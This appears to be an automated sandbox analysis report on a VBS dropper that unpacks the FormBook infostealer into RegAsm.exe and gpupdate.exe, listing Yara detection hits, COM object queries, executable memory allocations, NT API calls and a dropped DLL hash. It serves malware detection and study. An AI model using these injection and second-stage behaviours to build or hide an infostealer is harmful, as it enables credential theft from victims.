            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 10:20:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C563 NtClose,3_2_0042C563
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022107AC NtCreateMutant,LdrInitializeThunk,3_2_022107AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FAE8 NtQueryInformationProcess,LdrInitializeThunk,3_2_0220FAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FB68 NtFreeVirtualMemory,LdrInitializeThunk,3_2_0220FB68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220F9F0 NtClose,LdrInitializeThunk,3_2_0220F9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FDC0 NtQuerySystemInformation,LdrInitializeThunk,3_2_0220FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02210060 NtQuerySection,3_2_02210060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02210078 NtResumeThread,3_2_02210078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02210048 NtProtectVirtualMemory,3_2_02210048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022100C4 NtCreateFile,3_2_022100C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221010C NtOpenDirectoryObject,3_2_0221010C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022101D4 NtSetValueKey,3_2_022101D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02210C40 NtGetContextThread,3_2_02210C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022110D0 NtOpenProcessToken,3_2_022110D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02211148 NtOpenThread,3_2_02211148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FA20 NtQueryInformationFile,3_2_0220FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FA50 NtEnumerateValueKey,3_2_0220FA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FAB8 NtQueryValueKey,3_2_0220FAB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FAD0 NtAllocateVirtualMemory,3_2_0220FAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FB50 NtCreateKey,3_2_0220FB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FBB8 NtQueryInformationToken,3_2_0220FBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FBE8 NtQueryVirtualMemory,3_2_0220FBE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220F8CC NtWaitForSingleObject,3_2_0220F8CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02211930 NtSetContextThread,3_2_02211930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220F938 NtWriteFile,3_2_0220F938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220F900 NtReadFile,3_2_0220F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FE24 NtWriteVirtualMemory,3_2_0220FE24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FEA0 NtReadVirtualMemory,3_2_0220FEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FED0 NtAdjustPrivilegesToken,3_2_0220FED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FF34 NtQueueApcThread,3_2_0220FF34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FFB4 NtCreateSection,3_2_0220FFB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FFFC NtCreateProcessEx,3_2_0220FFFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FC30 NtOpenProcess,3_2_0220FC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FC60 NtMapViewOfSection,3_2_0220FC60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FC48 NtSetInformationFile,3_2_0220FC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FC90 NtUnmapViewOfSection,3_2_0220FC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FD5C NtEnumerateKey,3_2_0220FD5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02211D80 NtSuspendThread,3_2_02211D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0220FD8C NtDelayExecution,3_2_0220FD8C
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeCode function: 2_2_004F3E352_2_004F3E35
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeCode function: 2_2_004F0EA82_2_004F0EA8
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeCode function: 2_2_004F0B082_2_004F0B08
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeCode function: 2_2_004F0B182_2_004F0B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004184C33_2_004184C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004023503_2_00402350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042EB833_2_0042EB83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FCFB3_2_0040FCFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004044863_2_00404486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FD033_2_0040FD03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00402E603_2_00402E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004166B33_2_004166B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FF233_2_0040FF23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040DFA33_2_0040DFA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221E2E93_2_0221E2E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022223053_2_02222305
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0226A37B3_2_0226A37B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C63BF3_2_022C63BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022463DB3_2_022463DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221E0C63_2_0221E0C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C26223_2_022C2622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0226A6343_2_0226A634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022246803_2_02224680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0222E6C13_2_0222E6C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0222C7BC3_2_0222C7BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A443E3_2_022A443E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022665403_2_02266540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A05E33_2_022A05E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0223C5F03_2_0223C5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022CCBA43_2_022CCBA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A6BCB3_2_022A6BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0224286D3_2_0224286D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0222C85C3_2_0222C85C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0226C9203_2_0226C920
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022229B23_2_022229B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C098E3_2_022C098E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022369FE3_2_022369FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022B49F53_2_022B49F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02252E2F3_2_02252E2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0223EE4C3_2_0223EE4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02230F3F3_2_02230F3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022BCFB13_2_022BCFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02292FDC3_2_02292FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022AAC5E3_2_022AAC5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C2C9C3_2_022C2C9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02250D3B3_2_02250D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0222CD5B3_2_0222CD5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C12383_2_022C1238
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022273533_2_02227353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221F3CF3_2_0221F3CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0224D0053_2_0224D005
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0229D06D3_2_0229D06D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022230403_2_02223040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0223905A3_2_0223905A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022AD13F3_2_022AD13F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022B771D3_2_022B771D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A579A3_2_022A579A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022557C33_2_022557C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0225D47D3_2_0225D47D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022554853_2_02255485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022314893_2_02231489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0222351F3_2_0222351F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022C35DA3_2_022C35DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022D3A833_2_022D3A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02247B003_2_02247B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022ADBDA3_2_022ADBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221FBD73_2_0221FBD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022BF8EE3_2_022BF8EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0229F8C43_2_0229F8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A394B3_2_022A394B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022A59553_2_022A5955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022ABF143_2_022ABF14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0224DF7C3_2_0224DF7C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022BFDDD3_2_022BFDDD
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E96DE55_2_61E96DE5
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E431765_2_61E43176
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E5D5835_2_61E5D583
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E4A5255_2_61E4A525
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E3A4805_2_61E3A480
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E1F76F5_2_61E1F76F
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E4477E5_2_61E4477E
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E389F95_2_61E389F9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E7B95B5_2_61E7B95B
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E158ED5_2_61E158ED
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E478435_2_61E47843
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E2CA965_2_61E2CA96
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E4CC725_2_61E4CC72
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E49FA35_2_61E49FA3
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E1BEC05_2_61E1BEC0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 1E6DCCBDF8527ABB53C289DA920463B7895300D0D984CC7E91A3ECDA4E673190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02263F92 appears 132 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0226373B appears 253 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0228F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0221DF5C appears 137 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0221E2A8 appears 60 times
            Source: 0CkEHZjZgO.vbsInitial sample: Strings found which are bigger than 50
            Source: sqlite3.dll.5.drStatic PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\gpupdate.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
